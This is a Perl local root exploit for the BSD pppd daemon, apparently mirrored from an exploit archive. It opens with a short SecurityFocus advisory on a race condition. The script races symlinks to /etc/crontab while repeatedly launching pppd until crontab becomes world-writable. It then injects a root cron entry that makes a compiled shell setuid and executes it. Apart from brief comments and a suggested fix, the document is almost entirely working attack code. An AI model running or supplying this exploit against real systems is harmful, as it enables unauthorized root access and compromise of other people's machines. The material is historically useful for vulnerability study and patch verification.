174 lines
No EOL
4.6 KiB
Perl
Executable file
174 lines
No EOL
4.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/5355/info
|
|
|
|
A vulnerability has been reported in some versions of the pppd daemon included with multiple BSD distributions.
|
|
|
|
A race condition error in the code may result in the pppd process changing the file permissions on an arbitrary system file. pppd will generally run as a privileged user.
|
|
|
|
This issue has been reported in OpenBSD versions 3.0 and 3.1. Earlier versions of OpenBSD may share this vulnerability, this has not however been confirmed.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
# Local root exploit for AnyBSD. Tested on my 4.3 FBSD homebox.
|
|
#
|
|
# (C) 2002 Sebastian Krahmer -- stealth at segfault dot net ;-))
|
|
#
|
|
# NOT for abuse but for educational purposes only.
|
|
#
|
|
# Exploit description:
|
|
#
|
|
# The BSD pppd allows users to open any file even if its root owned.
|
|
# It then tries to set apropriate terminal attributes on the filedescriptor
|
|
# if a connection-script is given. As if it isn't bad enough that it allows
|
|
# you to open roots console for example it also has a race: If the tcgetattr()
|
|
# fails it calls some cleanup routines which use chown() to restore the mode
|
|
# of the terminal (at least it ASSUMES it is an terminal). It should rather use
|
|
# the tty_fd to restore the mode because between open() and tcgetattr failure+chown()
|
|
# we link the file to /etc/crontab which will then have the mode of the former file
|
|
# (which is probably 0666 :)
|
|
|
|
# Some code snippets.
|
|
#
|
|
# The vulnerable open():
|
|
# ...
|
|
# /*
|
|
# * Open the serial device and set it up to be the ppp interface.
|
|
# * First we open it in non-blocking mode so we can set the
|
|
# * various termios flags appropriately. If we aren't dialling
|
|
# * out and we want to use the modem lines, we reopen it later
|
|
# * in order to wait for the carrier detect signal from the modem.
|
|
# */
|
|
# while ((ttyfd = open(devnam, O_NONBLOCK | O_RDWR, 0)) < 0) {
|
|
# if (errno != EINTR)
|
|
# syslog(LOG_ERR, "Failed to open %s: %m", devnam);
|
|
# if (!persist || errno != EINTR)
|
|
# goto fail;
|
|
# }
|
|
# ...
|
|
# close_tty() which is called during cleanup because tcgetattr() of
|
|
# the fd will fail:
|
|
#
|
|
# static void
|
|
# close_tty()
|
|
# {
|
|
# disestablish_ppp(ttyfd);
|
|
#
|
|
# /* drop dtr to hang up */
|
|
# if (modem) {
|
|
# setdtr(ttyfd, FALSE);
|
|
# /*
|
|
# * This sleep is in case the serial port has CLOCAL set by default,
|
|
# * and consequently will reassert DTR when we close the device.
|
|
# */
|
|
# sleep(1);
|
|
# }
|
|
#
|
|
# restore_tty(ttyfd);
|
|
#
|
|
# if (tty_mode != (mode_t) -1)
|
|
# chmod(devnam, tty_mode);
|
|
#
|
|
# close(ttyfd);
|
|
# ttyfd = -1;
|
|
# }
|
|
#
|
|
# The chmod() bangs.
|
|
# Fix suggestion: use fchmod() instead of chmod() and do not allow
|
|
# users to open root owned files.
|
|
|
|
|
|
|
|
# ok, standard init ...
|
|
umask 0;
|
|
|
|
chdir("$ENV{HOME}");
|
|
system("cp /etc/crontab /tmp/crontab");
|
|
|
|
# create evil .ppprc to catch right execution path in pppd
|
|
open O, ">.ppprc" or die $!;
|
|
print O "/dev/../tmp/ppp-device\n".
|
|
"connect /tmp/none\n";
|
|
|
|
close O;
|
|
|
|
print "Starting ... You can safely ignore any error messages and lay back. It can take some\n".
|
|
"minutes...\n\n";
|
|
|
|
# create a boomsh to be made +s
|
|
create_boomsh();
|
|
|
|
# fork off a proc which constantly creates a mode 0666
|
|
# file and a link to /etc/crontab. crontab file will "inherit"
|
|
# the mode then
|
|
if (fork() == 0) {
|
|
play_tricks("/tmp/ppp-device");
|
|
}
|
|
|
|
|
|
# fork off own proc which inserts command into crontab file
|
|
# which is then executed as root
|
|
if (fork() == 0) {
|
|
watch_crontab();
|
|
}
|
|
|
|
my $child;
|
|
|
|
# start pppd until race succeeds!
|
|
for (;;) {
|
|
if (($child = fork()) == 0) {
|
|
exec ("/usr/sbin/pppd");
|
|
|
|
}
|
|
wait;
|
|
last if (((stat("/tmp/boomsh"))[2] & 04000) == 04000);
|
|
}
|
|
|
|
# ok, we have a lot of interpreters running due to fork()'s
|
|
# so kill them...
|
|
if (fork() == 0) {
|
|
sleep(3);
|
|
system("killall -9 perl");
|
|
}
|
|
|
|
# thats all folks! ;-)
|
|
exec("/tmp/boomsh");
|
|
|
|
|
|
###
|
|
|
|
sub create_boomsh
|
|
{
|
|
open O, ">/tmp/boomsh.c" or die $!;
|
|
print O "int main() { char *a[]={\"/bin/sh\", 0}; setuid(0); ".
|
|
"system(\"cp /tmp/crontab /etc/crontab\"); execve(*a,a,0); return 1;}\n";
|
|
close O;
|
|
system("cc /tmp/boomsh.c -o /tmp/boomsh");
|
|
}
|
|
|
|
sub play_tricks
|
|
{
|
|
my $file = shift;
|
|
for (;;) {
|
|
unlink($file);
|
|
open O, ">$file";
|
|
close O;
|
|
|
|
# On the OpenBSD box of a friend 0.01 as fixed value
|
|
# did the trick. on my FreeBSD box 0.1 did.
|
|
# maybe you need to play here
|
|
select undef, undef, undef, rand 0.3;
|
|
unlink($file);
|
|
symlink("/etc/crontab", $file);
|
|
}
|
|
}
|
|
|
|
sub watch_crontab
|
|
{
|
|
for (;;) {
|
|
open O, ">>/etc/crontab" or next;
|
|
print "Race succeeded! Waiting for cron ...\n";
|
|
print O "\n* * * * * root chown root /tmp/boomsh;chmod 04755 /tmp/boomsh\n";
|
|
close O;
|
|
last;
|
|
}
|
|
exit;
|
|
} |